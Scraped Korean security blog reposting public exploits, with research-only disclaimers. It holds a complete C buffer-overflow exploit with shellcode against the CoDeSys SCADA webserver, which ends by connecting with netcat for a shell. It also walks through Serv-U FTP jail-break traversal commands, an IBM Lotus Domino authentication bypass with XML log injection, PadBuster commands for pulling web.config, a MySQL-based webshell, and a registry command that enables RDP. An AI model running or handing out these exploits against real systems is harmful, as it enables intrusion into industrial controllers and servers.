http://wiki.secmobi.com/tools:android_dynamic_analysis


http://forum.xda-developers.com/xposed/framework-xposed-rom-modding-modifying-t1574401


http://www.sectechno.com/2014/02/02/fino-android-security-assessment-tool/

Posted by bitfox
l

잠시 딴생각(?) 하는 틈에 재미난 취약점이 발견 되었군요;;

Microsoft IIS Tilde Character Short File/Folder Name Disclosure

 

IIS 서버군에서 *~*를 이용해 폴더명이나 파일명을 유추할 수 있는 취약점이 존재합니다.

 

자세한 내용은 아래문서를 참조해 보시면 되겠네요..ㅎㅎ

http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf

 

microsoft_iis_tilde_character_vulnerability_feature.pdf

Posted by bitfox
l

윈도우 계열에서(XP, NT, 2003)에서 RDP 일명 "원격 데스트톱 연결" 서비스를 레지스트리 값 변경을 통해 시작 또는 정지 시킬 수 있습니다.
또는 방화벽 또한 재부팅 없이 레지스트리로 제어할 수 있습니다.

일단 명령어 입니다.

RDP 서비스 시작
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

RDP 서비스 정지
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

 /d의 값이 서비스 on/off 동작입니다.


[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.


 

Posted by bitfox
l
본 내용은 APM 환경에서 기본 계정을 사용하거나 혹은 관리되지 않는 My SQL로 인해 시스템이 침해당할 수 있다는 것을 보여주고자 작성하였습니다. 많은 보안 담당자들이 쉽게 방심하는 부분임으로 적절한 조치가 필요한 것으로 보여집니다.

[화면 1]일반적인 APM설치 후 노출되는 Setup 정보 페이지

[화면 2] phpinfo 파일이나 웹루트를 추측하여 웹쉘이 올려야 하는 경로를 예측함.

[화면 3] APM 초기 기본 패스워드로 공략


[화면 4] My SQL DB 서버 관리자페이지 접근

[화면 5] SQL 명령어로 webshell 파일 생성


[화면 6] WS.php란 cmd 웹쉘이 만들어짐

[화면 7] CMD 웹쉘을 통해 서버 공략 가능

위와 같이 DB에 대해 접근이 가능하다면 충분히 웹쉘을 생성 및 공격이 가능합니다. SQL군에 대해 각자의 명령어가 조금씩 다를뿐 위와 같은 원리는 공통적인 부분이며 각자의 대처 방안 비슷합니다.

우선적으로 본 예시의 보안 대책으로는 APM설치 후 계정에 대해 반드시 패스워드를 변경해야 하며 부가적으로 아래와 같이 httpd-alias.conf 파일을 찾아 ip제한을 두는 것도 효과적인 기술적 보안 대책입니다.



[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

'위험한_친구들 > 뚱띵이_SQL' 카테고리의 다른 글

Padding oracle attack explained  (0) 2011.10.19
SQL Injection Cheat Sheet  (0) 2011.10.13
Aqua Fold - Aqua Data Studio  (0) 2011.08.09
Posted by bitfox
l


The WiFi Protected Setup protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours.


[출처] thehackernews.com


[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

Posted by bitfox
l

/*
CoDeSys v2.3 Industrial Control System Development Software
Remote Buffer Overflow Exploit for CoDeSys Scada webserver
Author : Celil UNUVER, SignalSEC Labs
www.signalsec.com
Tested on WinXP SP1 EN
THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!
--snip--
  
root@bt:~# ./codesys 192.168.1.36
  
CoDeSys v2.3 webserver Remote Exploit
 by SignalSEC Labs - www.signalsec.com
  
[+]Sending payload to SCADA system!
  
[+]Connecting to port 4444 to get shell!
192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.36] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
  
C:\Program Files\3S Software\CoDeSys V2.3\visu>  
  
--snip--
  
*/
  
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
  
#define name "CoDeSys v2.3 webserver Remote Exploit"
#define PORT 8080
#define JUNK "A"
  
int main ( int argc, char *argv[] )
{
  
   
int sock, i, payload;
  
struct sockaddr_in dest_addr;
  
char *target = "target";
  
char request[1600], *ptr;
  
  
char ret[] = "\x67\x42\xa7\x71"; //ret - WINXP SP1 EN , mswsock.dll
  
char hellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
"\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x58"
"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x32\x45\x47\x45\x4e\x4b\x58"
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34"
"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x52\x4b\x38"
"\x49\x58\x4e\x36\x46\x42\x4e\x41\x41\x36\x43\x4c\x41\x43\x4b\x4d"
"\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48"
"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x30\x50\x35\x4a\x56"
"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46"
"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x36\x47\x37\x43\x57"
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x45\x43\x55\x43\x45\x43\x34"
"\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x41\x31"
"\x4e\x35\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a"
"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41"
"\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x54\x47\x55\x4f\x4f\x48\x4d"
"\x42\x55\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36"
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x32\x4e\x4c"
"\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x48\x44\x4e\x41\x33\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x52"
"\x43\x39\x4d\x58\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x34\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x35\x41\x35\x41\x35\x41\x45\x4c\x56"
"\x41\x30\x41\x35\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f"
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x45\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";
  
printf ("\n%s\n by SignalSEC Labs - www.signalsec.com\n", name);
  
if (argc < 2) 
{
        printf ("\nUsage: codesys [IP]\n");
        exit (-1);
}
  
setenv (target, argv[1], 1);
  
  
memset (request, '\0', sizeof (request));
ptr = request;
strcat (request, "GET /");
  
for(i = 1; i < 776; i++){
  
    strcat (request, JUNK);
}
  
strcat (request, ret);
strcat (request, hellcode);
strcat (request, " HTTP/1.1");
strcat (request, "\r\n");
  
  
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("\nsocket error\n");
        exit (1);
        }
  
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(PORT);
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
        perror("inet_aton problems");
        exit (2);
        }
  
memset( &(dest_addr.sin_zero), '\0', 8);
  
if (connect (sock, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
        perror("\nCouldnt connect to target!\n");
        close (sock);
        exit (3);
        }
  
payload = (send (sock, ptr, strlen(request), 0));
if (payload == -1) {
        perror("\nCan not send the payload\n");
        close (sock);
        exit(4);
        }
close (sock);
printf ("\n[+]Sending payload to SCADA system!\n");
sleep (1);
printf ("\n[+]Connecting to port 4444 to get shell!\n");
sleep (2);
system("nc -vv ${target} 4444 || echo 'Sorry exploit failed! Change RET address or be sure target is not patched!'");
exit (0);
}

[출처] exploit-db.com


[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

Posted by bitfox
l


I m better than TESO!
CONFIDENTIAL SOURCE MATERIALS!

[*]----------------------------------------------------[*]
 Serv-U FTP Server Jail Break 0day
 Discovered By Kingcope
 Year 2011
[*]----------------------------------------------------[*]

Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...

[*]----------------------------------------------------[*]
C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready...
Benutzer (192.168.133.134:(none)): ftp        (anonymous user :>)
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd "/..:/..:/..:/..:/program files"
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r--   1 user     group           0 Nov 12 21:48 .
dr--r--r--   1 user     group           0 Nov 12 21:48 ..
drw-rw-rw-   1 user     group           0 Feb 14  2011 Apache Software Foundatio
n
drw-rw-rw-   1 user     group           0 Feb  5  2011 ComPlus Applications
drw-rw-rw-   1 user     group           0 Jul 11 01:06 Common Files
drw-rw-rw-   1 user     group           0 Jul  8 16:57 CoreFTPServer
drw-rw-rw-   1 user     group           0 Jul 11 01:06 IIS Resources
d---------   1 user     group           0 Jul  8 16:12 InstallShield
Installation Information
drw-rw-rw-   1 user     group           0 Jul 29 15:07 Internet Explorer
drw-rw-rw-   1 user     group           0 Jul  8 16:12 Ipswitch
drw-rw-rw-   1 user     group           0 Feb 12  2011 Java
drw-rw-rw-   1 user     group           0 Jul 26 13:19 NetMeeting
drw-rw-rw-   1 user     group           0 Jul 29 14:39 Outlook Express
drw-rw-rw-   1 user     group           0 Jul  8 15:39 PostgreSQL
drw-rw-rw-   1 user     group           0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw-   1 user     group           0 Feb 12  2011 Sun
d---------   1 user     group           0 Jul 29 15:13 Uninstall Information
drw-rw-rw-   1 user     group           0 Feb  5  2011 VMware
drw-rw-rw-   1 user     group           0 Jul  8 15:34 WinRAR
drw-rw-rw-   1 user     group           0 Jul 26 13:30 Windows Media Player
drw-rw-rw-   1 user     group           0 Feb  5  2011 Windows NT
d---------   1 user     group           0 Feb  5  2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
ftp>
[*]----------------------------------------------------[*]
with write perms:
ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition
[*]----------------------------------------------------[*]
and as anonymous ftp:
ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
200 PORT Command successful.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s
[*]----------------------------------------------------[*]

This works to!!! :

220 Serv-U FTP Server v7.3 ready...
Benutzer (xx.xx.xx.xx:(none)): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
AUTOEXEC.BAT
boot.ini
bootfont.bin
bsmain_runtime.log
CONFIG.SYS
Documents and Settings
FPSE_search
Inetpub
IO.SYS
log
MSDOS.SYS
msizap.exe
MSOCache
mysql
NTDETECT.COM
ntldr
Program Files
RavBin
RECYCLER
Replay.log
rising.ini
System Volume Information
TDDOWNLOAD
WCH.CN
WINDOWS
wmpub
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s

[*]----------------------------------------------------[*]
Sometimes you need to give it the path:

ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
360
Adobe
ASP.NET
CCProxy
CE Remote Tools
cmak
Common Files
ComPlus Applications
D-Tools
FFTPServer
HTML Help Workshop
IISServer
InstallShield Installation Information
Intel
Internet Explorer
Java
JavaSoft
K-Lite Codec Pack
Microsoft ActiveSync
Microsoft Analysis Services
Microsoft Device Emulator
Microsoft MapPoint Web Service Samples
Microsoft MapPoint Web Service SDK, Version 4.0
Microsoft Office
Microsoft Office Servers
Microsoft Silverlight
Microsoft SQL Server
Microsoft Visual SourceSafe
Microsoft Visual Studio 8
Microsoft.NET
MSBuild
MSXML 6.0
NetMeeting
Outlook Express
PortMap1.61
Reference Assemblies
Rising
SQLXML 4.0
SQLyog Enterprise
STS2Setup_2052
Symantec
Thunder Network
TSingVision
Uninstall Information
Windows Media Player
Windows NT
WindowsUpdate
WinRAR
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
ftp>

[출처] exploit-db.com


[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

Posted by bitfox
l
/* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit
 *
 * KINGCOPE CONFIDENTIAL - SOURCE MATERIALS
 *

 

 * This is unpublished proprietary source code of KINGCOPE Security.
 *
 * (C) COPYRIGHT KINGCOPE Security, 2011
 * All Rights Reserved
 *
 *****************************************************************************
 * bug found by Kingcope
 * thanks to noone except alex whose damn down
 *
 * tested against:  FreeBSD-8.2,8.1,7.2,7.1 i386;
 *                  FreeBSD-6.3 i386
 *                  FreeBSD-5.5,5.2 i386
 *                  FreeBSD-8.2 amd64
 *                  FreeBSD-7.3, 7.0 amd64
 *                  FreeBSD-6.4, 6.2 amd64
 *
 */
  
I m better than TESO 7350 see attached.
I aint mad at cha
and dont forget that the scene is fucked.
and that the public scene is fucked too, kind of.
youse a down ass bitch and I aint mad at cha.
thanks lsd you are the only one NORMAL.
hear the track before you see the code:
http://www.youtube.com/watch?v=krxu9_dRUwQ
BTW my box (isowarez.de) got hacked so expect me in a zine :>
  
/Signed "the awesome" Kingcope
  
Code:
http://www.exploit-db.com/sploits/7350roaringbeastv3.tar



[출처] www.exploit-db.com



[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

Posted by bitfox
l
# Exploit Title: IBM Lotus Domino Controller auth. bypass
# Date:30/11/2011
# Author: Alexey Sintsov
# Software Link: http://www.ibm.com/
# Version:8.5.3/8.5.2 FP3 (0day) 
# Tested on: Windows 7 / Windows 2008
# CVE : CVE-2011-1519
  
  
Application: IBM Lotus Domino Controller
Versions Affected: <=8.5.2 FP3, <=8.5.3
Manager 4.0 prior to Update 4
(0day) 
Vendor URL: http://ibm.com
Bug: own XML parser  
CVE: CVE-2011-1519
CVSS2: 9.0
Exploits: YES
Reported:2010-09-23 via ZDI
Date of Public Advisory: 2011-03-22
Authors: Alexey Sintsov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)
  
This bug was found by Patrik Karlsson and sold to ZDI. IBM make fix for this bug,
but not enough. So this sploit can make auth. bypass in Lotus Domino Controller even with patch from IBM. So still 0day.
Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41
  
EXPLOIT:
  
1. Make port-fwd from 127.0.0.1:2050 to REMOTE_TARGET:2050
2. Inject XML into IIS log file (for an example)
  
ncat targethost 49152
GET /<user HTTP/1.0\r\n\r\n
  
  
ncat targethost 49152
GET /user="admin"cookie="pass"address="http://twitter/asintsov" HTTP/1.0\r\n\r\n
  
(\r\n\r\n) ENTER two times 8)
  
3.Run this from local web-server (dconsole.jar - IBM Lotus Domino Console applet)
  
<html>
<body>
<script>
function onLoadConsole()
{
alert("Connected");
}
</script>
<applet name = "DominoConsole"
code = "lotus.domino.console.DominoConsoleApplet.class"
codebase = "http://127.0.0.1/domjava/"
archive = "dconsole.jar"
width = "100%"
height = "99%"
>
<PARAM NAME="debug" VALUE="true">
<PARAM NAME="port" VALUE="2050">
<PARAM NAME="useraddress" VALUE="http://twitter/asintsov">
<PARAM NAME="username" VALUE="admin">
<PARAM NAME="cookiefile" VALUE="\..\..\..\windows\system32\logfiles\httperr\httperr1.log">
<PARAM NAME="cookievalue" VALUE="pass">
<PARAM NAME="onLoad" VALUE="onLoadConsole">
</applet>
</body>
</html>


[출처] exploit-db




[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.
Posted by bitfox
l

Padding oracle attack explained

In cryptography, the padding oracle attack is an attack on the CBC mode of operation, where the server leaks data about whether the padding of an encrypted message is correct or not. oracle refers to a mechanism in cryptography that can be used to determine whether a test has passed or failed. This information would help an attacker to decrypt and encrypt data without key.

How to find your .NET application is vulnerable to padding oracle attack or not?

    1. Using burp proxy capture a request to webresource.axd file
      Ex: http://somesite.com/webresource.axd?d=qmZbysenet6VGS94Ord8gQ2
    2. Change one character in the d value and send the request to the server. Observe the response.
    3. Send request to a non existent aspx page on the server. Observe the response.
      Ex: http://somesite.com/nonexist.aspx
    4. Response 2 and response 3 are differ, then it is possible to exploit the attack.

My OWASP presentation on 20-Aug-2011:

padbuster tool can be used to automate the padding oracle attack. This tool is a free ware and you can download it from – https://github.com/GDSSecurity/PadBuster/blob/master/padBuster.pl

* Perl is required to run padbuster. Perl can be downloaded from
http://strawberry-perl.googlecode.com/files/strawberry-perl-5.12.3.0.msi

Padbuster usage to attack .NET applications

  1. Encrypt web.config file –
    padBuster.pl http://somesite.com/WebResource.axd?d=AAAAAAAAAAAAAAAAAAAAAA2
    AAAAAAAAAAAAAAAAAAAAAA2 16 -encoding 3 -plaintext "|||~/web.config
  2. Brute force the first block-
    padBuster.pl http://www.myapp.com/ScriptResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAA
    AAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -encoding 3 -bruteforce –log
  3. Observe the log, at some point you will get 200 ok message, grab that URL and paste it in browser. It displays the web.config content.

Watch this video to get a better understanding of the attack:




[출처]
http://securitylearn.wordpress.com/2011/08/19/padding-oracle-attack-explained/



[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

'위험한_친구들 > 뚱띵이_SQL' 카테고리의 다른 글

My-SQL을 이용한 Webshell 만들기  (0) 2012.02.28
SQL Injection Cheat Sheet  (0) 2011.10.13
Aqua Fold - Aqua Data Studio  (0) 2011.08.09
Posted by bitfox
l